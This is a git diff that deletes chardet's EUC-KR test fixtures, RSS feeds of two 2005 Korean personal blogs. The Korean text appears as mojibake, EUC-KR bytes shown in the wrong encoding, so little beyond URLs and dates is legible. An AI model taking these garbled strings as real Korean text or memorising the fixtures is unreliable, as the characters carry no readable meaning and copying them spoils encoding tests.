    -ְֿ´ ¾מֱ¦ ¿£µש µ־°³ֲ° ÷¸°ם...
    -"±׳·¡ ³ ֲ¯¸װ¾מ¶ף~" -_-;
    -³×¼±ָ¸¶µµ ¼׃ ±ְ»´כ·־ ±´ֲ ÷־÷׀ְּ ְײְ¸³× ְּ °װְ׃ְ÷ ¹÷°¡ ¹¦ַׁ ÷־÷׀ְּ ְײ´.
    -ֱן, °רֶק¿µָ­¿¡¼­ ¾מ¶² ÷־÷׀ְ» ¸ײ¸®¼­ ֱ¡ֱ¡ ´ץ ֵ¬·־ֱמ¾קַ״ֱײ¸י¼­ ַר¿ְ½÷·± ´ְ³¦ְ» ֱץֶרַֿ´ֲ ½ֵµיְּ ְײ´ֲµ¥
    -ְּ °װְ׃ְ÷ ±׳·± ¼¼¼¼ַׁ ÷־÷׀ְ» ְְְּֿֿ ¹¦»חַ״°¡¸י¼­ °ט¼׃ְְ־ ַר¿ְ°¨ְ» ֱ״´.(¹¹ ַר¿ְ°¨ְּ¶ץ ¸»ְּ ֱצ³×ִ¥ֱצ ¸נ¸£°ְ¸³× ַֿ´ֲ ³»³» ´ְ³¢´ֲ ½ֵ°זְּ °ֵ½½¸®´ֲ ´ְ³¦ְ÷ ְּ·ח ַ¥ַצַׂ ¼צ ¾ר´.)
    -

    -

    ְּ·¸°װ ±ֽ¿±°ם ¹¶צַׁ ¿©µ¿»‎ְּ... ָזָז ₪׀₪׀


    -ְ½ְֵַ ¼ֱַׁׂ ´©ְּµ¿»‎ְּ ´¸¥ ¼‎xµי¿¡°װ »©¾ׂ°וְ» ¶§ְַ ±׳ ´ְ³¦ְּ¶ץ...(¾מְּ ½ִִ® ¾מµר³ִ? --)+
    -÷»ְ־ְּ ¾ֱֶק TRUE BLUE¸¦ ¸רַ״¼­ °´°ְ ÷ס±³´ֲ ¸רַֿ°ְ¸³× ANGELS BLUE÷¸´´ֲ ָ®½ַָק ְ׃ֶֶׁ®°¡ ְײ´ֲ °ֽ °°´.
    -
    -PS. NTR¿¡ ֶ׀·±מֱצ... LILIM ´ֿ³׳ ֲ¯¸װ¾מ¶ף~ - ]]> -
    - ¹ּ÷׀·ש - Tue, 21 Jun 2005 05:19:50 GMT -
    - - <![CDATA[ I'm Back~! ]]> - http://calmguy.egloos.com/1432720 - - -ְֿ´ ±׳°£ ¾מ¶»°װ ֱצ³ֲ³ִ¸¦ ֱ» ¾ך±גַ״÷¸ְ¸י
    -°ב·׀ְְ¸·־ ֱ¶¿כָק »ל¾ׂ°ם... ¿¡·־°װ´ֲ ְ÷¸´ ָ־¾ְ ´תַֿ°װ µַ¾ת´°ם ַ״µ־ֱׂ.
    -±׳¸®°ם ¾מ¸¥ֵַׁ׳ ַ¿הַׁ ְְֿ» ְּ°ְֽת°ֽ ַֿ´÷¸´ֿ±מ... ¼¼»ףְ÷ ֱ₪¸» »ל±ג ָµח °קְּ¶ף´ֲ ±³ְֶָ» ¾ע¾ת°ם
    -¶§·־´ֲ ְּ·± ±ְ» ¾²´ֲ ½ֳ°£°ת ¿¡·־°װ¸¦ ַֿ´ֲ ½ֳ°£µµ ֱ₪¸» ¾ֶ±ץ´°ם ´ְ³¢°װ µַ¾ת½ְ´ֿ´.
    -¿¡·־°װ¿¡ ¹ִּ¡°ם ֱצ¸§¿¡ ¹ִּ¡°ם... ¹°·׀ ±׳·± ָ°µ¿ְּ °נ ִט°¨ְ» ֱײ±ג ¶§¹®ְּ¶ף´ֲ °ְֽ÷ ְתµµ µ¿ְַַױ´ֿ´.
    -ִט°¨ְ» ¾ע±ג ְ§ַ״¼­ ¾מ¸¥ְּ ¼תְ» ¸¶½ֳ°ם µµ¹ְ» ַֿ°ם ¿©ְ³¢°ם ְ·¯°¡°ם ַֿ´ֲ °ֽ°ת ´¸¦ °ְּֽ ¾ר´ֲ ַאµ¿ְװ´ֿ´.
    -´, ±׳°ְֽ» ַֿ´ֲ ´כ»ףְּ ³×ְּ ¾מ¸° ֳ»¼ׂ³גְּ¶ף´ֲ »ח½ְַּ ¹®ֱ¦ְ־°ֱֵׂ.(ֱ¦°¡ ֳ»¼ׂ³גְּ¶ף°ם ¿ְַ״´ֲ ¸¶½ֳ±ז --;)
    -¹¹ ±ה¸» ¾ַָֿ°½ְ´ֿ´.
    -³×ְּ ¾מ¸° ÷׀µיְ÷ »ן°¡ַֿ¼¼¿ה.
    -¿©·¯÷׀ְּ ְּ·± °ֽ¿¡ ÷ֱ®¼­ ָסָס´צ°ֵ¸±¶§ ¿©·¯÷׀ְ÷ ¹÷°¡¸¦ µמ°¡±³ָ¯ַֿ°ם ְײ´ֲ °ּ´ֿ´.
    -±׳ µמ°¡±³ָ¯ַֿ´ֲ°װ ¹«¾שְּ³ִ±¸¿ה?
    -¹·־ ¿©·¯÷׀ְַ '½ֳ°£'
    -±׳¸®°ם ±׳ ½ֳ°£ְ» ¹«¾נ°¡ ´¸¥ ְֿ¿¡ ½טְ¸¸י ÷¯ְַ» ¿©·¯÷׀ְַ ְ־»‎ְַ '°¡´ֹ¼÷'ְװ´ֿ´.
    -<´ץ ְּ»ףְַ ְ¼¼ַׁ ¼³¸םְ÷ »‎·«ַׁ´>
    -
    -¾ױְ¸·־ °³± ֶק½÷ֳֶ °°ְ÷ °ְֽ÷ ¾ר½ְ´ֿ´.
    -ְת´ֲ ¾מ¸¥ְ¸·־¼­ ¿¡·־°װ¸¦ ֱס±ג°ם °¡² °װְ׃¿¡¼­ ´ְ³₪ ֱ¡ְ» ְ°םְ ַױ´ֿ´.
    -¾מ¸¥ְּ ¾ֶ´ֿ°ֵ³× ְ¾מµµ ´¸¥ »ח¶קְַ ְַ°¿¡ °¿כַׂ ¼צ ¾ר´ֲ ֳµשµיְ÷ ¿ְֱצ¸¶¼¼¿ה.
    -ְּ °ר°£ְ÷ ְתְַ 'world'´ֿ±מ¿ה~ ^^
    -¿¡·־°װ¸¦ »‎ָ°ְַ ְח¹ּ·־ ¹¾ֶµיְֿ ¼צ ְײ´ֲ ÷׀ְ÷ ¾נֱ¦¶ףµµ ָ¯¿µְװ´ֿ´.
    - - ]]> -
    - ¹ּ÷׀·ש - Tue, 14 Jun 2005 04:24:28 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/chisato.info.xml b/chardet/tests/EUC-KR/chisato.info.xml deleted file mode 100644 index c5e48ab..0000000 --- a/chardet/tests/EUC-KR/chisato.info.xml +++ /dev/null @@ -1,1170 +0,0 @@ - - - - -ABIMORO.. webLifeSay.. -http://chisato.info/blog/index.php -.. ¾ֶ÷ס, »ל¾ֶ°¡°ם ְײ´. -ko -Fri, 9 Dec 2005 19:49:38 +0900 - -ָ²¿ל¼®, ±׳¸®°ם ַַµנ¼צֳ¸ - ½ְֳֿ¾¹ז¼÷´כ°מ(דְלםו¥¯ב¢׃ֽײ) -http://chisato.info/blog/index.php?pl=673 -½ְֳֿ¾¹ז¼÷´כ°מ(דְלםו¥¯ב¢׃ֽײ) - ְּ ³¯ְ» ¸ס³ץ¾ֶ ֵ©°װ ¿ל³כ¶ף
    -: ַַµנ¼צֳ¸ ֶףֱצ ³םְַ¿¡ ÷־ֳִ. ³²ֱ¶ ַֿ³כ¾ֶ »ח¼³.
    -
    -
    -ֱצ³­ ¹ר ָ²¿ל¼® ±³¼צְַ ְ±¸®¹®ֱ¦°¡ ÷ׂ°ֱֵ³ְ» ¶§ ¾מ¸®¼®ְ÷ ¿ל¸® ³׳ֶ¼ֱנµיְ÷ ¼­·־ ¸»ַֿ±ג¸¦, "ְ±¸®¹®ֱ¦´ֲ ±גֱ״¿¡ µ¶ף ¾מֲקַַ ´¸¥ °ְּֽ¸ח ְֿ´ְַ ¿ל¼±ְ÷ ±¹ְְּֽ ¾ֶ´ֿ·ֳ°¡ ¿ְ´ֳ ְּ·¯ַׁ ¹®ֱ¦°¡ ÷ׂ°ְֱֵ÷ ַ°ז ¹ּ±¹ְּ ¿ל¸®ְַ ¼÷°רְ» ֱת½ֳַֿ¿© °ֵ²·¯ֶ®¸®°םְ ַװְּ¸®¶ף."ַֿ¿© ¾מµנ¼­ ֶ¢¾מ³×¿ֲ ¹¹ֱּ₪½ֵ±מֱצ µ¡÷¿© ´ס±°זְן¿¡ ¿­¼÷ְ» µיְּ±ג ¸¶ֱצ ¾¾ׂ´. ±׳·¯³× ֳµַֿ ְֿ °¡¿מµ¥ ¿¹ֳרֵ° ¾מ·ֱ¿מ ְֿµµ ¸¹µµ´. ֳµ¸¸ ²¹¿¡ ¹ּ¿מ ֵ׀ ִ ¹ָש ַַµנ¼צֳ¸¿¡µµ ְ±¸®¹®ֱ¦°¡ ¾מֲמַֿ¿© ³םְַµַ¾ת´ֲ°¡. ְּ ֳכְחְ±¸® ¹®ֱ¦´ֲ ÷ס´ ָ²¿ל¼® ±³¼צְַ µ¹ִֶ±¸°¡ µֹ »׃¸¸ ¾ֶ´ֿ¶ף ³׳ֶ¼ֱנµיְַ °­¼÷ַׁ ¹«±גµµ µַ¾מֱ ְֲ־ ֱן, ±׳·¸´¸י ¸ױְת ֱ¦±גµַ¾ת´ר ָ²¿ל¼® ±³¼צְַ ְ±¸®¹®ֱ¦´ֲ ¾מµנ·־ »ח¶ףֱ³´ֲ°¡? ±׳°ְֽ÷ ±׳·¸´ ַֿ´ץ¶ףµµ ¿©ֲֵ²¯ְ» ±¹¹־ְַ ¾ֻ±ַ¸®¿ֽ ¹־½ְֹ÷ ¹‎÷¸´ ¿לְ§¶ף´ר ³׳ֶ¼ֱנְַ °­°זַׁ ½ֱֹצ·־ ÷¼ ¶§¿¡ "¼ײֱקָק ֲֹ²ְ÷ °ֱֵ‏¸» ַ¾מ¿ה"¸¦ ¹אָש °ֽ ¸¸ְ¸·־µµ ַַµנ¼צֳ¸ְ÷ ְּ ֱצ°ז¿¡ ְּ¸¦ °ְֽ» ¼³¸¶¼³¸¶ ְַ» °ְּֽ´. ±׳·¯³× ½½ֱַµµ´. ְת °­¾׀ְְ־ ±÷÷־ֱ₪±ַ¿¡ ְַַֿ¿© ¾נ·׀ְּ ֱ¶ְµַ°ם ֵ÷¾׀µַ¾ת´ר ְ·¸¦ µי¾מ¼­´ֲ ¾ֻ±ַ¸®¿ֽ ֳכְחְְ¯¸¦ ¿ן÷־ֲ¢´ר ³׳ֶ¼ֱנµיְ÷ ְ±ג ְֿ½ְֵַ ¸»÷־ִ§ְּ³× ֱ¶ָ¸¼צ¸¦ ¹¶ף¸י¼­ ָ¦¶ף´ח ¾ף±¼ְ» ¹²°װ µַ¾תְ¸´ֿ ±מֱ‏°ֽ ¾ְֶּµנ¸¸ ¹²¸י ¹«¿¡°¡ »ף°ְֿ±מ ַ´ר °ְּֽ´. ¾ֶ, ±׳ ֱ¿הַֿ´´ר ¾נ·׀ְַ ְְ¯´ֲ ³²¿¡°װ µי¾מ ¹ִ¡°ם, ֳכְחְ±¸® ¶§¸®´ְ¶ף ¿¬±¸ְ±¸®´ֲ ¹´¿¡ ³»ֶ״°ִ£ ֳ₪ µַ¾תְ¸´ֿ, ְת ÷־ַ¥ֳ³·³ ¶°´´ֿ¸ח ¼׃ְ¸·־ ²¿½ְ¾מַֿ´ֲ ´¸¥ ¾נ·׀µיְּ¾ ±םְּ ²ֲ¢ְ» °ֽµµ ¾ר´. ֱַֿצ¸¸ ¸ם»צְּ ¹‎÷¸´ ³»°¡ ְ§¶ף´ר ¹־½ֹ ¿©·¯÷׀ְ÷ ´ֱצ ¿­ָ­°°ְּ ֵ°÷¸µו µ־µי±טְ¸·־ ½ְְֶַַֹ ְ¸®¿¡ ¼­¼­ ְּ¸§°ֵ¸®³× ְו¸¸ַֿ·ֱ ַ´ץ¶ץ ¸»ְּ³ִ. ±טְֲֳֵֿ³·³ ¿ֲ ¸צ ¹ֳִ ÷׀½ֵ ַׁ °ֽµµ ¾ֶ´ֿ¿ה, ַ´´ֲ ֱ‏ְּ¶ף°ם´ֲ ´כֵכ·ֹ ¾ף±¼¿¡ ֶהְ־ֶ® °ט¶ץְּ³× ֵץֳ´ַ´ר ְּ°¡ ¿­»ח ָה³»¸¦ ³»¸ח ֱ¦¼ׂ¸¦ ¿מ¿מַֿ°ם ְײְ¸´ֿ ±׳ ¹«½¼ ¸י¸סְ¸·־ ¹‎ִ¡ֱײְַ ±¹°¡ְַ ±¹¹‎ְ» ³םַׂ °ְּֽ¸ח, ±׳ ¹«½¼ ¸י¸סְ¸·־ ֱצ³­ ³¯ְַ ±÷ֱ₪÷־ ¶§¸®±ג¸¦ ֱ₪´חָ­ ַׂ °ְֽ־°¡. ¾ֶ! ¿רֵכֱַׁצ°ם, ¾ֶ! ÷׀ֱַׁצ°ם. ¿ל¸® ³׳ֶ¼ֱנ, ְ³­ ÷ם·־°ֵ µיְּ¿©! »ל¾ׂ´ֲ°¡, ֱ׳¾ת´ֲ°¡? ±÷ֱ₪±ַ¿¡ ¹גָק´ֲ ¾נ·׀ְ÷ ¹«ֱ¶°ְַַ ³»ֶםְּ°ם ³׳ֶ¼ֱנְ÷ (¾נ·׀ְ») ¸¶ְ½²¯ ¹ג¾ֶ³»¾מ ¸פ¾ֶ¼¼¿צµµ ְֱֱ÷ °ְֽ־°¡. ¿רֵכַֿ°ם ¿רֵכַֿ´. ֵ°÷¸µו¿©! ¸¶¿ל½÷¿©! (ְ¹®) [³כ¾ְֶֿ÷¸] 2102ָ£ (2005. 12. 08)
    -
    -´ְֱמ¸·ְּ ְֿ¾מ³×¼­ ִ¿ַַ ַׁ ְ ³»¸®¸י¼­ ·ְְִֹֽׁ» ְ¸£°ם ְײ´ֲµ¥ ½ֵ¹® 1¸יְּ ´«¿¡ µי¾מ¿װ´. ַַµנ¼צֳ¸ְַ ֶףֱצ¶ף. ±׳µ¿¾ָ ¸׃¸®¾ִֶֶ ¸» ²¨³»±ג´ֲ »ן°¡°ם ְײ´ר ְּ¹ר »חֲֵ(?)¿¡ ´כַֿ¿© ַׁ ¸¶µנ ´רֱצ°םְ µַ¾תְ¸´ֿ ¹®µז ְוֱצ¿¬ ¼±»‎ְּ ¶°¿ֳ¶ף ¹ּ¹®(±‏)¿¡ ְ־¿כַֿ´ֲ °ב·¸¦ ¹ַֿ¿´´.
    -¿¹ְ°°ְ¸¸י ְּ·± ± ¾²¸י¼­ [³²µיְּ ¹¹¶ף°ם ¹ְְַׂ·ֱ³×]¸¦ °ץ°ץ »‎°¢µµ ַ״÷¸°ם ¿¹ֳרµµ ַֿ°ן ַֿ¿´ְ¸³×.. ³×µµ ³׳ֶ¼ֱנ »‎ָ° ÷ם·־°ֵ »‎ָ° °ר·ְֲּ ½׳ְּ´÷¸´ֿ ¾נֱ¦ ¾מµנ¼­³× »‎°¢ֱצ ¸רַׁ ¼ׂ¸®°¡ ³×¿ֳ °ֽ¿¡´ֲ ³מ¶קְּ ¾ר°װ µַ¾ת´(³»°¡ ¹÷¸³ִ. ¿©ְָק ±פֲ¦±פֲ¦ ³מ¶ף°װ).
    -±׳¸®ַֿ¿© ְֿ´ְ÷ ´רֱ®µ־°ם ֲשֲשָק ¹ְְַֿ±ג·־ ַֿ¿´ְ¸´ֿ ֲש¼÷ַׂ ְ´ֲ ֲש¼÷ַֿ°ם ¹´כַׂ ְ´ֲ ¹´כַֿ¸ח ִ¿פְ½ִ¥ ְ´ֲ ִ¿פְ½ִ¡°ם ±׳ְת ¹°·¯°¡±ג ¹¶ץ´.
    -
    -
    -³×ְַ ְ־ֵֽ³ ¼­ַ־ »‎ָ°ְ÷ ¿¹ְ°ת °°ֱצ ¾¾ֶ ´½ֳ ±ְ» ָ®ְ־ַֿ´ֲ °ְּֽ ´ְ» ¼צ ְײ´. ½ְְֳֿ» ֱ» µ־°ם µ¹¾ֶ¿ֲ ¶§¿¡ ´ס±ְּ°ם ֶ®·¢¹יְּ°ם ¾ר´¸י ±׳ »חְּ ÷ם·־±׳¿¡ °ֵ¸®µ־°ם °¸ְֱ» ֱס±ג´ר ְ¯ְ¯ְְ »‎ָ°ְּ °ב½ְַ» ¸־¾ת³×÷¸´ ½ֽ¾מ ³×µµ ±׳³ֹ ¸»°´. :)
    -
    -
    -]]>
    -½־¿צ¶ף, ¼¼»ף°ת -ַֿ³כ¾ֶ -Thu, 8 Dec 2005 12:02:45 +0900 -
    - -¼±»‎´װְ÷ ¸»ַֿ¼ֱּצ, &quot;ֵ«ְְֿװ´ֿ´&quot; -http://chisato.info/blog/index.php?pl=672 - -
    -°¡ְו °¡±מ¿מ ִ¡°תְַ ¼±»‎´װְ÷ ְ־»ףְּ ¸ֵ¿ל ְֱֱ÷ ÷׀ְ¸·־, ְֱּ¦ ³×µµ ¹־¸ֱַװְּ¶ף°ֵ³× ¾ֻ ¶§µµ µַ¾ת°ם(, ¶ף±ג÷¸´´ֲ ¾ֻ¾ֶ¾ ַׂ ¶§°¡ ֱצ³µ°ם..) ¿¹ְ÷¸´´ֲ ְַ¿¬ַׁ ֳ´ְ» ²¹ּ´ֲ °ְּֽ ½¬¿צֱ³´. .... ±׳·¡µµ.. ±׳·¡µµ °¡±ג ½ָ¾ת´±¸.
    -
    -
    -
    -
    -
    -¹®ֱ¦°¡ µַ´ֲ ִ¡¾ֶ´ֲ ¿ְ¸¥ֲ °¡ְו ¾ְֲַָ ְּ µ־ °³. ְ§¿ֽ ¾ֶ·¡ ַֿ³×¾¿ ַױְּ µְּׁ´. ±׳ ֱ¿¡µµ ´ץ¿ם ¾ֲֶַ °ְֽ÷ ¾ֶ·§ֲ. ±±ג¾ ±׳ ¿ן¸²°ת ½ֳ¸²¶§¹®¿¡ ְב¿¡¼­ ±ת¾מ³­ ¿ְ´ֳ, ִ¡°ת°¡ ¹®ְ» ¿­¾תְ» ½ֳ°£ ֱ¶± ³ׁ¾מ¼­ ִָ´´ ´³א¿װ´. ְַַּֿ¸י ֱײ¸»¿¡ ¾ֱֶַ³ִ±¸. ¾מ¶±ַׂ ¹זµµ°¡ ¾רְ¾ֶ. ²ֲִ¦¾רְּ ְֲֵּ¸¦ °ם»‎ַֿ°ם ¸»¾ׂ´ר °ְּֽ´.
    -
    -
    -
    -"¾מµנ°¡ ¾מ¶»°װ ¾ֲֶַ°¡¿ה?"
    -
    -ְ½. ¿×½ֳ ִ¡°תְַ»ח´ֲ ְ‏ְ÷ ¼±»‎÷¸´´ֲ ְ־»ףְֱֱ÷ ַׂ¾ֶ¹צֱצ°¡ ֱֱ´. ¸¸ָ­°°ְ÷ °ֵ ÷¸¸י ¹ּ³²ְַ»ח ¿¡ַַ¼ׂµוµµ ²ֿ µֱַצ¸¸.. ְ‏ְ÷ »ח¶קְ÷ ¾ֶ¹«·¡µµ ½ֵ¿כְּ ´ת °£´. ¾מֱצ°£ָק ³×ְּ°¡ µי¾מְײ¾מ¾ °ז·ֲµµ ֱ» ¹ְֿ½ֱקַֿ°ם.. ֶ¯ָק ִ¡°ת ֳ³·³ ±״µµְַ °רֶק¸¦ µ¿¹ַֿ´ֲ ְו¼ׂ¿¡´ֲ ÷־µו·¯¿מ ´ְ³¦ְַ ַׂ¾ֶ¹צֱצ¸¦ ְ‎´כ ֱצֱצַֿ´ֲ ¹ְּ´.
    -
    -¾מֲמµַ¾ת°ֵ³× ³×´ֲ ֱץ»ףְ» ְ¼¼ָק ָ£¼ַׂ´.
    -
    -"¾ֶ·§ְֲּ ¾ֱֶַ´±¸¿ה?"
    -"³׳. ³¹«³¹« ¾ִֶֶ¼­ ¿ְ´ְֳ÷ ְ´°¡ ±ת¹צ·ָ¾מ¿ה. ½ֳ¸®°ם.. ¾ֶ·§ְֲּ¿ה. ְ§´ֲ ֱ» ³×ְ÷µ¥."
    -".... ְ½.. ְּ°ֵ ֵ«ְְֿ־µ¥?"
    -
    -
    -
    -
    -
    -
    -.... ¹¹½ֳ¶ף. ֵ«ְְּֿ¶ף.
    -
    -
    -
    -
    -"³׳?"
    -"ֵ«ְְֿװ´ֿ´."
    -
    -
    -
    -
    -
    -¹¹°¡ ֵ«ְְּֿ¶ף´ֲ °ַ°¡¿ה¿ְ¿ְ¿ְ¿ְ¿ְ¿ְ¿ְ~~
    -
    -ְּ¹ּ ֶ׀´׀¿¡ ÷ֱ®µי°ם ְײ¾ת´. ¼±»‎´װְּ ¶הµיְּ¸ח ´כ´הַׁ °ֽµµ ¾ֶ´ׁµ¥ ַׁ ְ½ְ‎°ת ְ½ְ‎ »חְּ°¡ ¿ְָֿק ¿לֱײ¸¦ ְ¯¿µַֿ°ם ¿ְ´ֲ ½ֳ°£ֳ³·³ ´ְ²¸ֱ³´.
    -
    -¼±»‎´װְּ ¾¾ְֽ ¿פְ¸¼ּ´(¸¶½÷ֵ©¸¦ ַֿ°ם ְײ´ֲµ¥ ¹÷ ¼ׂ¸®³ִ°ם? ¿ײ ´ְ²¸ֱצ´ֲ °ֵ ְײְ¾ֶ. ¹ּ¼ׂ¶ףµח°¡, ַֿ´ֲ °ְֽ÷..).
    -
    -
    -
    -
    -".... ֳזִ¡´ֲ ְ§¿¡ ְײ´ֲµ¥ ¾ֶ·¡°¡ ¾ֱֶַ´. .... ֵ«ְְֿ־µ¥."
    -
    -
    -
    -
    -
    -¾ְֶ׳. ³­ ¶ַ ¹¹¶ף±¸. ³מ¶תְ¾ֶ¿ה. ְֽ»ל½÷·¹ ¹ּ¼ׂ ֱצְ¸½ֳ±ג´ֲ. ¹־¸ֱַֿ°װ½ֳ¸®..;;
    -
    -
    -
    -¹¹, °ב±¹ְ÷ ½÷ֶ®·¹½÷°¡ 8ְַּׂ¾ת´ר °ַ°¡. (< ֶ²·ֱ. 9ַׂ ְּ»ףְּ´) ¾מֲ·µח °£´ַׁ ִ¡·ב¸¦ ¸¶ִ¡°ם µ¹¾ֶ¿װ´. ֱצ±ְ÷ ¾נֱ¦ ±׳·¨³ִ´ֲ µם ·¹¸נ³׳ְּµוµµ ¸¸µי¾מ ¸װ¾ת´.
    -
    -±׳³×ְת³× ±׳ ÷´¿ר¿¡´ֲ °£ָ£÷־°¡ µ־ ¸םְ־µ¥, ַֿ³×°¡ ¾א°£ ¿¡¶ף´. ¹«¼­¿מ ¿©ְ. .... ¹² °ְֽ» °ְַַµו¸®°ם ½ֽ¾ת´.
    -ְַ·ב÷¸ַטֱץְ» ³»¹׀¾מµ־°ם ±ג´¸®°ם ְײ´ֲµ¥ ֱ¢¼צ°ט¿¡¼­ ¹¹¶ף°ם ¼ׂ°ן¼ׂ°ן ַׁ´. ¸ְ־ °£ָ£÷־ ְֲּ ְְַֹ» ֱײ°ם ְײ´ֲ ¼ׂ¸®.
    -
    -"¾ך, ±׳ ְּ¸§ְ÷ ¾ֶ¹«·¡µµ ³²ְְ¾ֶ. ְת ָ¯ְ÷׀ ְּ¸§ ¸ֲ¾ֶ?"
    -"¿¡? ¿¡?...."
    -
    -.... ¿ל¸® ¾ֶ¹צֱצ ְּ¸§ְ¸·־ ֳ­ֶ®¸¦ ¸¸µי°ם ְײ¾ת´ר ¿ל¸®ְַ ¿¡¶ף°£ָ£÷־. .... ¾מֲ¼ְ°ם. ¼³ָ₪ ְּ¸§ְ¸·־ ַע°¥·ָ´ ֳִµµ.. ֱײ¹־¹רָ£ ָ®ְ־µµ ¾ַָֿ¸י¼­ ÷£²¼´ ¸»ְּ¿ְ !!
    -
    -
    -
    -
    -
    -ִ¡·ב³¡³×°ם ³×¿ְ´ֲ ±ז¿¡ ±׳ ¿¡¶ף°£ָ£÷־°¡ "ַׁ ½ֳ°£ ִָ¸י ְּ¸¦ »ח¿כַֿ½ַ ¼צ ְײ´"°ם ַ´. 1½ֳ°£ ֱ₪µµ ֱצ³×¼­ ¿לְ¯¸¦ ¸¶¼ּ´ֲµ¥ ְּ°¡ ½ֳֵ«ַֿ´. .... ±׳³ֹ ±׳·² ¼צµµ ְײֱצ, ½ְֽ÷°װ ¾ֶ´ֿ°ם ¾ֶ¹«·¡µµ °£ָ£÷־°¡ 2½ֳ°£ְ» 1½ֳ°£ְּ¶ף°ם ַׁ ±ג÷׀. .... ֵ°ְ׳.
    -(¹°·׀ ַׁ½ֳ°£ְּ ¸ֲ´. ¾ֶ¸»°¨ ֳ³¸®ַׁ ְּ¸¦ µ־½ֳ°£ ±ג´¸®¶ף°ם ַֿ´ֲ °קְ÷ ¾מֲקַַ ¾רְ½. .... ±׳·¡µµ ¹¹, ½ֵ°זְּ ¾÷¿´´, ְּ ¸»ְֱּצ)]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Mon, 21 Nov 2005 14:28:39 +0900 -
    - -ֱ₪ֲש¿ל ¾¾¿¡ °םַװ - ±׳¶§±׳¶§ ´¶ף¿ה 2, ¿ײ ¿פ±גֱצ ¾ְ»±מ? -http://chisato.info/blog/index.php?pl=671 - -
    -
    -±׳·¯³×?
    -
    -
    -
    -¾ָ ¿פ±ה´.
    -
    -
    -½ֹ°¢ַֿ°װ ¾ָ ¿פ±ה´.
    -
    -
    -
    -
    -
    -¹°·׀ ±׳¶§±׳¶§ ´¶ף¿ה ¿ְ¸®ֱצ³¯ ¶§ ÷־ֵֽµµ ֳכַגְּ ¸ֲ¾ׂ´°ם´ֲ ַׂ ¼צ ¾רֱצ¸¸ ְּ¹ר¿¡´ֲ ´¸£´. ְח¹ְּײ´´ֲ ֶעְ» ֳ£±ג°¡ ¾מ·ֶ´. ֶרַ³°ת °°¾ׂ´ר ¿ְ¸®ֱצ³¯ ½ֱֳנ°ת´ֲ ´¸® ִ§ֳ¼ְֿ·־¸¦ °ְֹ» °ֽ °°´. ֳ¹ ÷¹±ֽ¹«´כ¿¡´ֲ ֵ¬·־ֲ¡ְ» ¸ֳ¾ֱׂצ¸¸ ְב½ֳ ´« ¶¼°ם ְײ´ר ֱ ¾מ´ְ»ץ ֱ°£ְ¸·־ ְ¸®¸¦ ¿ֵ°ו´. ֳִֵץְַ ÷¹±ֽ ֱײ¿¡ ֱ°£ְ¸·־ ְ¸®¸¦ ÷סֱִׁײ¾ת´ר [ַא´װ¾ֶ]°¡ ´½ֳ ֵ¬·־ֲ¡ְ» ²ח¾מֲש °ְּֽ´.
    -¿פֳ£»ח¸¦ ֱס° ÷¸´ֲ »ח¶קְּ¶ף¸י ¸נµ־ ¾ֻ ¼צ ְײ´ֲ »ח½ְֱַּצ¸¸ ¿פֳ£»חְַ ֵ¬·־ֲ¡ְ÷ ֱַ·־±׳·¥ ³»¿¡¼­ְַ ְװֱצ¸¦ »ףֲ¡ַׁ´. ¹«ֱ¶°ַ ÷ְ¼‏¾ֶַ׀´חְ¸·־ ¸¶¹«¸®¸¦ ֱ‏´ֲ °³ִ°ת´ֲ ´¸£´. °³ְִַ ֵ¬·־ֲ¡ְ÷ ÷ְ¼‏¾ֶַ׀´חְ¸·־ ֱ₪ַ״ֱ®ְײ±ג ¶§¹®¿¡, °³ְִַ ְ־±גֳ´µµ´ֲ ¿ְָק·ֱ ÷ְ¼‏¾ֶַ׀´חְַ ֵ¬·־ֲ¡ְּ´. ְ־±ג°¡ ¶³¾מֱר ְ¯¼¼ְ±(÷¹ַ׀»‎)ְּ ֳג»ךµו¶ף¿¡°װ ְ¸®¸¦ ³»¾מ³ץ¾ֶ¾ ַµםְּ, ¹ְְְּ ½ֳµיַ״ֱצ´ר ָ­»ף°םµµ ַא´װ¾ֶ¿¡ ְ¸®¸¦ ³»³ץ¾ׂ¾ת´.
    -
    -ֱַֿצ¸¸ ֳִֵץ°¡ ִִ¹יַ´ר °ְּֽ´. ½÷½÷·־ְַ ְו´ד´כ·־ [ָ־¾ְ ¿פ±ז °ֽ]ְּ¶ף´ֲ ¼׃ֶםְ» µי°ם. ±׳·¯³× °ב°ת´ֲ? ְֶם¸¸ַׁ ¼׃ֶם¾ר¾ת´.
    -
    -
    -
    -
    -¿ײ ¾ָ ¿פ±ג´ֲ°¡?
    -
    -
    -ְְּ¯´ֲ ¿©·¯°¡ֱצ°¡ ְײְ» °ְּֽ´. ָחָקµי ֱצְַֿ´ֲ´כ·־ ֳײ±ְַ ¿פֳ£»ח´ֲ ֱצ³×ִ¥ ֱ₪µµ·־ [ְ¯ַא¾מ]¿¡ ±ג´כ´ֲ ¸נ½ְְ» ÷¸¿©ֱײ°ם ְײ´. ְּ¹ר¿¡ µ¹¾ֶ¿ֲ ±טְַ־ְּ ¸ְֳ÷ ²ְֱצµיְ÷ ½ֹ°¢ַׁ ¼צֱ״ְּ´. °³ִ¿¡¼­´ֲ ְ¯¼¼ְ±ְּ ±׳·¯ַׁµ¥, ±״ְַ ֱרַא°ת´ֲ ¹«°ַׁ ְ¯ַא¾מְַ ¹÷¹ְ÷ ½ֳֳ»ְ¸¦ µ÷׀ַװְ¸·־ ¸פ°ם°¡°װ µַ´ֲ °ְּֽ´. (ְ¯¼¼ְ±ְּ »ץ·׃°װ ½ְֳַׁ [±µ¥, ְּ¹ּ] ´ֲ ֲק¶ף¸® ¿פֳ£»ח¿ֽ ´ץ ¾מ¿ן¸°´)
    -
    -¹°·׀ ְ¯ַא¾מ´ֲ ֱ¿הַֿ´. ַד³× ֱ¿הַֿ´´ֲ °ְּֽ ְ÷־¶ף´ֲ ְַ¹ּ´ֲ ¾ֶ´ֿ´. °³ִ¿¡¼­ ¿©·¯¸נ·־ ְ־±ג¸פְּ ְֱ־ ְוµ¿¹־(°³ִ, °ז÷ס¾ְֶת¾¾ ¿×)ְ÷ ְ´חַׁ ¼צֱ״¿¡¼­ ְ¯ַא¾מ¸¦ ²ק¾מִ¡´ֲ [¸ְ]ְ» ÷¸¿©ֱײ°ם ְײ´.
